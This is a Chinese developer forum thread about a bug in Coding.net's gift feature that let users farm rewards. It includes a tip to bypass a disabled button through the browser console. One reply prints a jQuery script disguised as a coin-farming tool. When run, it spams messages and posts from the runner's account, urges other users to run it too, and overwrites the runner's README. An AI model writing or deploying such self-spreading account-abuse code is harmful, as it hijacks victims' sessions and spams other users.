Coding.net 这几天送东西是不是有点过头了?

2015-06-05 15:32:58 +08:00
 Delbert
这是连服务器都送出去了?

5261 次点击
所在节点    Coding
9 条回复
RIcter
2015-06-05 15:35:21 +08:00
送东西那里有漏洞,可以刷礼物..
Delbert
2015-06-05 15:38:51 +08:00
@RIcter 大神,求脚本。
不要告诉我是 mabi.coding.io/shuamb.js ...............
跪谢233333333333
RIcter
2015-06-05 15:39:22 +08:00
@Delbert 我同事挖到的 @erevus
typcn
2015-06-05 15:48:50 +08:00
@Delbert F12 把 disabled 去掉,哈哈哈哈哈
typcn
2015-06-05 15:57:14 +08:00
手贱运行了一下。。。

$.post("https://coding.net/api/social/message/send", {
receiver_global_key: "Kyle_lyk",
content: "我在刷码币,求封号!"
}, "JSON");

for (var i = 0; 5 > i; i++) jQuery.post("https://coding.net/api/tweet", {
content: "@AKCoding @Coding 我在模拟手机发冒泡刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币" + new Date().getTime(),
device: "RM-937"
}, function(a) {
alert("模拟手机发送冒泡成功");
}, "json"), jQuery.post("https://coding.net/api/tweet", {
content: "@AKCoding @Coding 我在模拟电脑发冒泡刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币" + new Date().getTime()
}, function(a) {
alert("模拟电脑发送冒泡成功");
}, "json");

$.get("https://coding.net/api/tweet/best_user", function(a) {
for (var b = 0; b < a.data.length; b++) $.post("https://coding.net/api/social/message/send", {
receiver_global_key: a.data[b].global_key,
content: "我在刷码币,赶快和我一起来刷吧!"
}, "JSON");
}, "JSON");

alert("通过专用API获取码币成功!");

$.get("https://coding.net/api/tweet/public_tweets", function(a) {
for (var b = 0; b < a.data.length; b++) $.post("https://coding.net/api/social/message/send", {
receiver_global_key: a.data[b].owner.global_key,
content: "我在刷码币,赶快和我一起来刷吧!"
}, "JSON");
}, "JSON");

$.get("https://coding.net/api/account/current_user", function(a) {
jQuery.get("https://coding.net/api/user/" + a.data.global_key + "/project/mb/git/edit/master/README.md", function(b) {
b = b.data.lastCommit;
jQuery.post("https://coding.net/api/user/" + a.data.global_key + "/project/mb/git/edit/master/README.md", {
content: new Date().getTime() + "我在刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币",
message: "update README.md",
lastCommitSha: b
}, function(a) {}, "json");
alert("模拟项目推送获取码币成功");
}, "json");
}, "JSON");
Delbert
2015-06-05 15:58:28 +08:00
@typcn 我的意思是 肯定不是这个脚本。。。。。。
typcn
2015-06-05 15:59:56 +08:00
@Delbert 某地方的时间是可以指定的,修改不同的天数。。。
Delbert
2015-06-05 16:07:34 +08:00
@typcn 时间不能改的吧,要是能改就太弱了……
kisshere
2015-06-05 17:23:45 +08:00
应该是index.php都送出去了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/196344

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX